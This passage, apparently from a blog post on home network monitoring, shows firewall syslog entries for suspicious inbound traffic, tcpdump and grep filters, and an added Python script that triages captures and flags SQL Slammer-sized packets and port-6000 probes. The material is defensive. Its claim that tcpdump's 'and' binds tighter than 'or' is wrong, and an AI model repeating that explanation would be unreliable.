May  5 01:50:29 192.168.0.1 rferris [61286]:HTTP(80)                 Dest IP :74.125.127.191,         Src IP  :192.168.0.8
May  5 01:50:29 192.168.0.1 rferris [61287]:TCP(19609)                 Dest IP :98.247.182.78,         Src IP  :74.125.127.191
May  5 01:51:29 192.168.0.1 rferris [61288]:TCP(19609)                 Dest IP :98.247.182.78,         Src IP  :74.125.127.191
May  5 01:52:06 192.168.0.1 rferris [61289]:POP3(110)                 Dest IP :76.96.30.119,         Src IP  :192.168.0.9
May  5 01:52:06 192.168.0.1 rferris [61290]:TCP(20129)                 Dest IP :98.247.182.78,         Src IP  :76.96.30.119
May  5 01:53:06 192.168.0.1 rferris [61291]:TCP(20129)                 Dest IP :98.247.182.78,         Src IP  :76.96.30.119

 grep -i hacker syslog 
May  4 08:22:13 192.168.0.1 rferris Hacker Log[58760]:PROTO_TCP, SIP:61.164.116.52: 6000, DIP:98.247.182.78: 2967, Suspicious TCP Data
May  4 09:08:00 192.168.0.1 rferris Hacker Log[59132]:PROTO_UDP, SIP:84.237.112.4: 1046, DIP:98.247.182.78: 38507, Suspicious UDP Data
May  4 10:23:27 192.168.0.1 rferris Hacker Log[59292]:PROTO_TCP, SIP:123.10.44.80: 2205, DIP:98.247.182.78: 18448, Suspicious TCP Data
May  4 10:32:33 192.168.0.1 rferris Hacker Log[59294]:PROTO_TCP, SIP:121.14.152.130: 6000, DIP:98.247.182.78: 1433, Suspicious TCP Data
May  4 10:44:45 192.168.0.1 rferris Hacker Log[59298]:PROTO_UDP, SIP:173.8.113.195: 3193, DIP:98.247.182.78: 1434, Suspicious UDP Data
May  4 10:47:32 192.168.0.1 rferris Hacker Log[59300]:PROTO_UDP, SIP:93.5.92.78: 1137, DIP:98.247.182.78: 12712, Suspicious UDP Data

But firewalls don't catch and catalog all the packets, so you will need to filter and trap them yourself, perhaps with a set of tcpdump filters like so:

/usr/local/sbin/tcpdump -ntttvvveXX -i xl0 -s 65535 host [your leased IP] and 'not (arp or icmp or igmp)' and 'port not (bootpc or domain or pop3 or whois or http or https)' and 'host not (wf-in-f125.google.com or cns.beaverton.or.bverton.comcast.net or 73.98.100.1)' >> `date "+%b%e%H%M%S%Z%Y"`

Note the parentheses around the protocol exclusion: in tcpdump's filter syntax "and" binds tighter than "or", so an unparenthesized "not arp or icmp or igmp" would capture every ICMP packet instead of excluding it.

And after you have captured your filtered traffic, you may need more filtering to extract a list of IPs:

grep seq May\ 3115119PDT2009 | grep -v -f file | awk -F ">" '{print $1}' | more
$ more file
DHCP
ICMP
POP3
DIP
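As an added example (not code from either post), this goes one step past the grep/awk IP extraction above: it parses tcpdump -n lines like those from the dummy host capture in the Port 6000 post, groups inbound packets by external source, counts bare SYNs and the RSTs our host sent back, and flags the 376-byte udp/1434 datagrams and the source-port-6000 probes. The capture lines and the set of local addresses are constructed.

```python
import re
from collections import defaultdict

# Constructed tcpdump -n lines in the form shown above (an epoch -tt prefix is tolerated).
SAMPLE_CAPTURE = """\
1241648685.844326 IP 218.58.220.130.6000 > 192.168.0.12.2967: Flags [S], seq 1519714304, win 16384, length 0
IP 98.247.182.78.18495 > 192.168.0.6.6000: Flags [S], seq 363174240, win 5840, options [mss 1460,sackOK], length 0
IP 192.168.0.6.6000 > 98.247.182.78.18495: Flags [R.], seq 0, ack 363174241, win 0, length 0
IP 211.99.122.18.1870 > 192.168.0.6.1434: UDP, length 376
IP 79.21.157.80.2166 > 192.168.0.6.6429: Flags [S], seq 474425300, win 65535, length 0
IP 192.168.0.6.6429 > 79.21.157.80.2166: Flags [R.], seq 0, ack 474425301, win 0, length 0
IP 79.21.157.80.2166 > 192.168.0.6.6429: Flags [S], seq 474425300, win 65535, length 0
IP 192.168.0.6.6429 > 79.21.157.80.2166: Flags [R.], seq 0, ack 1, win 0, length 0
"""

LINE = re.compile(
    r"(?:\d+\.\d+ )?IP (\d+\.\d+\.\d+\.\d+)\.(\d+) > (\d+\.\d+\.\d+\.\d+)\.(\d+): "
    r"(?:Flags \[([^\]]*)\]|(UDP)).*length (\d+)")

def parse_packet(line):
    """Return the packet's endpoints, protocol, TCP flags and length, or None."""
    m = LINE.search(line)
    if not m:
        return None
    src, sport, dst, dport, flags, udp, length = m.groups()
    return {"src": src, "sport": int(sport), "dst": dst, "dport": int(dport),
            "proto": "udp" if udp else "tcp", "flags": flags or "",
            "length": int(length)}

def triage_capture(text, local):
    """Summarise inbound packets per external source; 'local' is our own address set."""
    per_src = defaultdict(lambda: {"dports": set(), "syn": 0, "rst_back": 0, "notes": set()})
    for line in text.splitlines():
        p = parse_packet(line)
        if p is None:
            continue
        if p["src"] in local:                    # the dummy host's own replies
            if "R" in p["flags"]:
                per_src[p["dst"]]["rst_back"] += 1   # closed port answered with RST
            continue
        entry = per_src[p["src"]]
        entry["dports"].add(p["dport"])
        if "S" in p["flags"] and "." not in p["flags"]:   # bare SYN (no ACK)
            entry["syn"] += 1
        if p["proto"] == "udp" and p["dport"] == 1434 and p["length"] == 376:
            entry["notes"].add("udp/1434 len 376 (SQL Slammer size)")
        if p["sport"] == 6000:
            entry["notes"].add("source port 6000 probe")
    return dict(per_src)
```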

Thus we have a literal boom in the network security business to make this type of data collection easier, more intuitive and more suitable for today's level of traffic: taps, filters, IDS/IPS devices, filtering firewalls with IDS functionality, protocol analyzers, etc.  But at some point, before you deploy any of this, you are going to want to break ground and sit and watch traffic, so that you viscerally understand the threats, attack vectors, sniffers and firewalls.